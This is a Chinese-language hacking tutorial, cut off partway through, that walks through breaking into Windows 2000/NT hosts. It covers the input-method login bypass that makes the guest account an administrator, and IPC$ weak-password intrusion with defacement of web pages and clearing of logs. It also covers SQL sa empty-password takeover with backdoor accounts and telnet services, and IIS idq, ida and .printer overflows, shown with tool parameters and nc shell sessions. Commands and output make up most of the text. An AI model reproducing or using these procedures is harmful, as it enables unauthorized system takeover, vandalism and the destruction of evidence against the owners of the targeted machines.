(1) Windows2000输入法漏洞
先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切 换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠 标右键。选择“帮助” ―― “输入法指南” ―― “选项”。
(如果发现“帮助”呈灰色, 放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入: c:\winnt\system32 (不一定要在c,要看具体情况)
在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在 “属性” ―“目标”―c:\winnt\system32\net.exe 后面空一格,填入 user guest /active :yes 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。 (此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” ―― “目标”―― c:\winnt\system32\net.exe 后面空一格,填入: localgroup administrators guest /add (这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以 “guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在 ,我们可以像操作本地主机一样,控制对方系统。
(2)IPC入侵
开始:在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。输入我们 要破解的IP段,我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获 得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机。在“辅助主机” 那里的“IPC$主机”前面打勾,然后在菜单了选“探测”,,扫描出结果以后,“IPC$主机”, 选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测” 的窗体,把那两个 选项都选了,然后点“选项” 为了加快弱口令扫描速度,这里的两个选项我们可以全部取消 记住。然后点“确定”出来后点“是”就开始探测了。一会儿,结果出来了。比如我们探测 出了用户名为“admin”的管理员,密码为“admin”,现在我们用命令提示符,熟悉下命 令吧,输入: net use
file://对方ip/ipc$ "密码"
/user:"用户名" || 建立远程连接 copy icmd.exe file://对方ip/admin$
||
admin$是对方的winnt目录 net time file://对方IP/ ||
看看对方的本地时间 at file://对方ip/ 启动程序的时间
启动程序名 启动程序的参数 ||
用at命令来定时启动程序 telnet 对方ip
端口
我们也可以改网页:
net use \\ip\ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir \\ip\c$\*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:\inetpub\wwwroot里面 输入 “dir file://ip/c$/inetpub/wwwroot/*.*”。就可以看到index.htm或index.asp或 就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了,假如你 黑页在C:下,就输入"copy 主页文件 \\ip\c$\inetpub\wwwroot"覆盖原文件这样就行了,简单吧?
日志清除,断开连接 :
我们copy cl.exe ,clear.exe 上去,再执行,就可以清除日志,比如clear all :清除所 有的日志。然后在断开连接:net use file://ip/ipc$ /delete
(3)SQL SA空密码漏洞
使用的工具:流光IV启动流光,按Ctrl+R。出现扫描设置对话框,设置扫描IP段,并且选择扫描的类型为SQL。 点击“确定”,进行扫描,假设我们取得主机:127.0.0.1,然后点击“工具” ―― SQL远 程命令(或者Ctrl+Q),填入主机IP(127.0.0.1)、用户(sa)、密码(空)点击“连接” 出现远程命令行的界面。
net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板:
打开cmd.exe,输入net use \\127.0.0.1\ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe:
copy srv.exe \\127.0.0.1\admin$\system32
上传ntlm.exe:
copy ntlm.exe \\127.0.0.1\admin$\system32
启动服务:
首先用net time \\127.0.0.1
看看对方主机的时间,(假如回显\\127.0.0.1 的本地时间是上午12.00),然后我们用 at \\2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入:
telnet X.X.X.X 99
然后我们要启动NTLM.exe:
在telnet状态下直接输入ntlm回车。
显示:windows 2000 telnet dump,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务:net stop telnet(先关闭telnet服务)再输入net start telnet(启动telnet服务)
然后我们退出telnet,然后在命令行下输入
telnet 127.0.0.1,
依照提示,接着输入用户名:heiying,密码:heiying1,回车。这样,我们的跳板就做好了, 简单吧? (上面上传的srv和ntlm等东东还有一个简便方法,全都可以直接用流光工具菜单 里的种植者上传,60秒后自动运行,不用敲命令!)
(4) idq溢出漏洞
要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。 首先扫描 一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方 的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左 面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出.OK 出现发送Shellcode成功的提示了,然后我们用NC来连接。
进入MS-DOS。进入“nc”的目录。然后:
nc --v IP 813
c:\nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK
c:看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。
c:\nc -vv IP 813
IP: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [IP] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32
终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。
(5)IDA溢出漏洞
所用程序:idahack
进入MS-DOS方式(假设idq.exe在c:\下)
c:\idahack.exe
运行参数:c:\idahack
chinese win2k : 1
chinese win2ksp1: 2
chinese win2ksp2: 3
english win2k : 4
english win2ksp1: 5
english win2ksp2: 6
japanese win2k : 7
japanese win2ksp1: 8
japanese win2ksp2: 9
korea win2k : 10
korea win2ksp1: 11
korea win2ksp2: 12
chinese nt sp5 : 13
chinese nt sp6 : 14
c:\idahack 127.0.0.1 80 1 80
connecting...
sending...
Now you can telnet to 80 port
Good luck ?
好,现在你可以telnet它的80端口了,我们用NC来连接。
C:\nc 127.0.0.1 80
Microsoft Windows 2000 [Version 5.00.2195]
(C)版权所有 1985-1998 Microsoft Corp
C:\WINNT\system32
OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。
(6).printer漏洞
这个漏洞,我们用两个程序来入侵。iis5hack和nc。
C:\iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
usage: D:\IIS5HACK.EXE
用法: D:\IIS5HACK <溢出的主机 <主机的端口 <主机的类型 <溢出的端口
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9
c:\iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
Listn: 80
connecting...
sending...
Now you can telnet to 3739 port
good luck
溢出成功!
c:\nc 127.0.0.19 119
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32
OK,我们又成功取得system权限!玩吧。
(7)139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具 假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到 用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET
